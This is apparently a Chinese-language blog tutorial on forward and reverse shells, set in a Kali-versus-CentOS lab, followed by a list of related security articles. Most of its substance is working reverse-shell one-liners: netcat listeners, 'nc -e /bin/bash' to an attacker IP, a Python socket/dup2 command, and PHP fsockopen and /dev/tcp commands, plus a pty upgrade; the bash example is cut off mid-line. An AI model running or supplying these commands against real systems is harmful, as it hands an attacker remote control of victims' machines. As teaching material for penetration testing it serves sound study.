反弹Shell

常见一句话反弹Shell

反弹攻击机开监听端口,靶机主动去连

正弹靶机开启端口,攻击机去主动去连

正向连接

正向shell:客户端(我)想要获得服务端的shell

假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。

反向连接

反向shell:**受害者的shell(权限)弹到攻击机上

  • 场景模拟
    • 假设小黑是一名黑客
    • 他悄咪咪溜进了知乎总部大楼,发现一台刘看山的电脑,但是刘看山出门了
    • 小黑发现电脑里有一个有趣的文件(刘看山的秘密)
    • 小黑下载这个文件到自己的U盘里,又悄咪咪的原路返航
    • 回到家后,小黑打开这个文件
    • 发现电脑被刘看山控制了~
    • (这里小黑是客户端,刘看山是服务端,客户端发射shell)

那么为什么要用反弹shell呢?

反弹shell通常适用于如下几种情况:

•目标机因防火墙受限,目标机器只能发送请求,不能接收请求。•目标机端口被占用。•目标机位于局域网,或IP会动态变化,攻击机无法直接连接。•对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知的。•..

对于以上几种情况,我们是无法利用正向连接的,要用反向连接。

那么反向连接就很好理解了,就是攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,即为反向连接。

反弹shell命令

得到shell一方(攻击机)只需要开启一个口子(监听端口),给shell一方(靶机)主动去找我们这个口子(监听端口),找口子所填写的地址端口都是攻击机的


kali开启监听端口,靶机主动连接后将shell反弹给攻击机

CentOS7  192.168.43.186

kali   192.168.43.19

nc

攻击机开启监听5555端口,等待靶机主动连接并反弹shell

nc -lvp 5555

靶机连接攻击机并将shell反弹过去 ,这样在攻击机上就可以执行靶机系统中命令

// 建立一个反向Shell连接,将远程主机的Shell连接到本地的/bin/bash程序
// Bash是一种命令行解释器,用户可以通过它执行各种命令 类似于windows的cmd

nc -e /bin/bash 192.168.43.19 5555  // 反弹到攻击机开启的5555端口上

bash shell

反弹bash shell命令详解

攻击机开启监听7777端口,等待靶机主动连接并反弹shell

nc -lvp 7777

靶机执行此命令,填写的IP是攻击

// 将自身的bash面板(cmd)重定向到攻击机的7777端口上

/d


bash -i是创建一个交互的bash shell

/dev/tcp/是bach实现网络请求的一个接口,打开这个文件就相当于发出了一个socket调用,建立一个socket连接

python

攻击机开启监听6666端口,等待靶机主动连接并反弹shell

nc -lvp 6666

靶机存在Python环境输入此命令修改IP端口即可

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.43.19',6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);

php

攻击机开启监听4444端口,等待靶机主动连接并反弹shell

nc -lvp 4444

靶机输入此命令即可反弹,但是PHP反弹需要php关闭safe_mode这个选项,才可以使用exec函数

php- 'exec("/bin/bash -i >& /dev/tcp/192.168.43.19/4444")'

or

php -r '$sock=fsockopen("192.168.43.19",4444);exec("/bin/bash -i 0>&3 1>&3 2>&3");'

如成功反弹后shell面板不是常规的调用此命令转化

python -c 'import pty;pty.spawn("/bin/bash")'
相关推荐
One_Blanks15 分钟前
eduSRC挖洞思路
网络安全·edusrc·挖洞
44漏洞观察员18 分钟前
windows实战-wordpress——玄机靶场
服务器·windows·web安全·网络安全·安全威胁分析
.Ayang1 小时前
微服务介绍
网络·安全·网络安全·微服务·云原生·架构·安全架构
MC何失眠2 小时前
泷羽sec-----shell编程(完结)
linux·学习·网络安全
44漏洞观察员2 小时前
linux实战-黑链——玄机靶场
linux·运维·服务器·web安全·网络安全
hackeroink5 小时前
想自学成黑客(白帽子),零基础小白如何自学黑客(网络安全)?
网络·安全·web安全·网络安全·黑客·编程·黑客技术
网络安全工程师老王6 小时前
关于OpenRASP的绕过实现
web安全·网络安全·信息安全
Yimuzhizi6 小时前
《企业网络安全架构与实战指南:从蓝队防御到零信任网络部署》
网络·人工智能·安全·web安全·搜索引擎·网络安全·架构
网安_秋刀鱼9 小时前
API安全
web安全·网络安全·1024程序员节
梦 & 醒10 小时前
hubuctf-2024校赛-复现wp
web安全·网络安全·ctf